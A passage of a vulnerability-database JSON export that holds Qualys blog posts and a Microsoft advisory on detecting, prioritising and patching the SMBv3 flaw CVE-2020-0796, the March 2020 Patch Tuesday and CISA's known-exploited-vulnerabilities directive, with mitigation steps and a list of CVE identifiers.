Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a critical \u201cwormable\u201d remote code execution (RCE) vulnerability in Microsoft Server Message Block 3.1.1 (SMBv3) protocol. 
The exploitation of this vulnerability opens systems up to a 'wormable' attack, which means it would be easy to move from victim to victim.\n\nQualys released a blog post earlier on how to identify the SMBv3 vulnerability in your environment: \n[Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796>)\n\nHere we describe how to resolve it with Qualys VMDR\u00ae.\n\n### Identify Assets, Discover, Prioritize and Remediate using Qualys VMDR\u00ae\n\nQualys VMDR, all-in-one vulnerability management, detection and response, enables: \n\n * Identification of known and unknown hosts running vulnerable SMBv3 servers and clients\n * Automatic detection of vulnerabilities and misconfigurations for SMBv3 servers and clients\n * Prioritization of threats based on risk\n * Integrated patch deployment \n\n#### Identification of Assets with SMBv3 Server or Client\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of hosts with an SMBv3 Server/Client and open port \"445\" \u2013\n\n_operatingSystem.category:`Windows/Server` and openPorts.port:445_\n\n_operatingSystem.category:`Windows/Client` and openPorts.port:445_\n\nUsing VMDR, you can also identify whether SMBv3 is enabled on the host via Qualys IG QID 45262, as shown below:\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, e.g. \u2013 SMBv3. This helps in automatically grouping existing hosts with an SMBv3 Server/Client as well as any new host that spins up with an SMBv3 server. 
Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover SMBv3 RCE Vulnerabilities and Misconfigurations\n\nNow that the hosts with an SMBv3 Client/Server are identified, you want to detect which of these assets are flagged for the CVE-2020-0796 vulnerability. VMDR automatically detects new vulnerabilities like CVE-2020-0796 based on the always-updated Knowledgebase.\n\nYou can see all your impacted hosts for CVE-2020-0796 (or by Qualys ID: 91614 or 91616) for your \u2018SMBv3\u2019 asset tag in the vulnerabilities view by using the QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2020-0796`_\n\nThis will return a list of all impacted hosts.\n\nQID 91616 helps identify assets with the patch ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) applied and QID 91614 helps identify assets with the SMBv3 workaround applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). \nAlong with the two confirmed vulnerability QIDs, Qualys released the following IG QID 48086 to help customers track assets on which they have the mitigation applied. This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled._\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With the \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. 
\n\n\n\nSimply click on the impacted assets for the SMBv3 threat feed to see the vulnerability and impacted host details.\n\nWith VM Dashboard, you can track SMBv3 vulnerabilities, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of SMBv3 RCE vulnerability trends in your environment using the [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>) -\n\n\n\n**Configuration management adds context to overall vulnerability management**\n\n\nTo reduce the overall security risk, it is important to take care of SMB server misconfigurations as well. Qualys VMDR shows your SMBv3 misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have the SMBv3 RCE vulnerability and which of those also have SMBv3 misconfigurations. Those hosts carry a higher risk than hosts that have the vulnerability but do not use the default port 445 or are already hardened. 
\n \nWith the [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover whether port 445 is open or restricted by the firewall, and whether hosts have misconfigurations relevant to the CVE-2020-0796 vulnerability.\n\n * Qualys configuration ID \u2013 11220 \u201cList of 'Inbound Rules' configured in Windows Firewall with Advanced Security\u201d is evaluated to identify whether port 445 is blocked by Windows Firewall inbound rules, as shown below -\n\n\n\n * Qualys configuration ID \u2013 14297 \u201cStatus of the open network connections and listening ports\u201d is evaluated to identify whether port 445 is open and listening, as shown below -\n\n\n\n * Qualys UDC configuration ID \u2013 101849 \u201cStatus of 'CompressionEnabled'\u201d (UDC type: \u201cRegistry Value Content Check\u201d) is evaluated to verify whether the value of \"DisableCompression\" is set to \"1\", as shown below:\n\n\n\n#### Risk-Based Prioritization of SMBv3 RCE Vulnerability\n\nNow that you have identified the hosts, versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on risk, as not every vulnerable asset poses the same risk. \n\n\n**High Risk:**\n\n * Hosts with SMBv3 enabled and neither the patch nor the workaround applied are at high risk. \n * If, for business reasons, it is not possible to apply the patch on hosts for which CVE-2020-0796 is detected, customers can check for misconfigurations (controls CID 14297 and CID 101849 failing) as shown below -\n\n\n\n\n\n**Medium Risk:**\n\n * Hosts with SMBv3 enabled for which CVE-2020-0796 is detected but configuration 101849 is detected as hardened are at medium risk.\n\n\n\n \n\n### Response by Patching and Remediation\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select \"cve:`CVE-2020-0796`\" in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 SMBv3.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour \u201cPatch Window\u201d to ensure all hosts will continue to receive the required patches as new patches become available for the emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n\n\nIn cases where due to business reasons, it is not possible to apply patches, it is recommended that you reduce your security risk by remediating the related configuration settings for all running SMBv3 servers as provided in [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) by applying following workarounds:\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. 
Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the critical SMBv3 RCE vulnerability CVE-2020-0796.", "cvss3": {}, "published": "2020-03-16T23:34:12", "type": "qualysblog", "title": "Automatically Discover, Prioritize and Remediate Microsoft SMBv3 RCE Vulnerability (CVE-2020-0796) using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-16T23:34:12", "id": "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/16/automatically-discover-prioritize-and-remediate-microsoft-smbv3-rce-vulnerability-cve-2020-0796-using-qualys-vmdr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T19:36:24", "description": "This month\u2019s Microsoft Patch Tuesday addresses 115 vulnerabilities with 26 of them labeled as Critical. Of the 26 Critical vulns, 17 are for browser and scripting engines, 4 are for Media Foundation, 2 are for GDI+ and the remaining 3 are for LNK files, Microsoft Word and Dynamics Business. Microsoft also issued a patch for an RCE in Microsoft Word. 
Adobe has not posted any patches for Patch Tuesday.\n\nIn terms of both volume and severity, this is a heavy Patch Tuesday.\n\nSee [details of the new detections](<https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/>), including description, consequence and solution.\n\n### Workstation Patches\n\nThe Scripting Engine, LNK files ([CVE-2020-0684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0684>)), GDI+ ([CVE-2020-0831](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0831>), [CVE-2020-0883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0883>)) and Media Foundation (CVE-2020-0801, CVE-2020-0809, CVE-2020-0807, CVE-2020-0869) patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Word RCE\n\nA Remote Code Execution vulnerability ([CVE-2020-0852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0852>)) in Microsoft Word is also covered in today\u2019s patch release. An attacker could exploit the vulnerability using a specially crafted file to perform actions on behalf of the logged-in user with the same permissions as the current user.\n\n### Application Inspector RCE\n\nMicrosoft has also fixed a Remote Code Execution vulnerability ([CVE-2020-0872](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0872>)) in Application Inspector. This vulnerability can allow an attacker to execute their code on a target system if they can convince a user to run Application Inspector on code that includes a specially crafted third-party component. 
This patch should be prioritized, despite being labeled as \u201cImportant\u201d by Microsoft.\n\n### Dynamics Business Central RCE\n\nDynamics Business Central client is affected by a Remote Code Execution vulnerability ( [CVE-2020-0905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0905>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled as \u201cExploitation Less Likely,\u201d considering the target is likely a critical server, this should be prioritized across all Windows servers and workstations.\n\nThere are no Adobe patches released for this Month's Patch Tuesday.\n\n**Update March 11, 2020**: See [Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796>)", "cvss3": {}, "published": "2020-03-10T19:07:42", "type": "qualysblog", "title": "March 2020 Patch Tuesday \u2013 115 Vulns, 26 Critical, Microsoft Word and Workstation Patches", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0684", "CVE-2020-0796", "CVE-2020-0801", "CVE-2020-0807", "CVE-2020-0809", "CVE-2020-0831", "CVE-2020-0852", "CVE-2020-0869", "CVE-2020-0872", "CVE-2020-0883", "CVE-2020-0905"], "modified": "2020-03-10T19:07:42", "id": "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. 
This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. 
CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps the catalog\u2019s CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, tagging them with the RTI field \u201cCISA Exploited\u201d. This is an ongoing effort, as CISA frequently adds the latest CVEs to the catalog as part of its regular feeds.\n\nDirective 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing the remediation of these identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend executing your search based on QQL (Qualys Query Language), as shown here for the QIDs released by Qualys: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. 
Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization get there. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help an organization of any size respond efficiently to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-27T00:23:14", "description": "**Important** March 12, 2020 - Microsoft has released CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability to address this vulnerability. For more information about this issue, including download links for an available security update, please review [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n\nMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client.\n\nTo exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\nWe will update this advisory when updates are available. If you wish to be notified when this advisory is updated, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://www.microsoft.com/en-us/msrc/technical-security-notifications?rtc=1>).\n\nPublicly Disclosed | Exploited \n---|--- \nNo | No\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-10T07:00:00", "type": "mscve", "title": "Microsoft Guidance for Disabling SMBv3 Compression", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 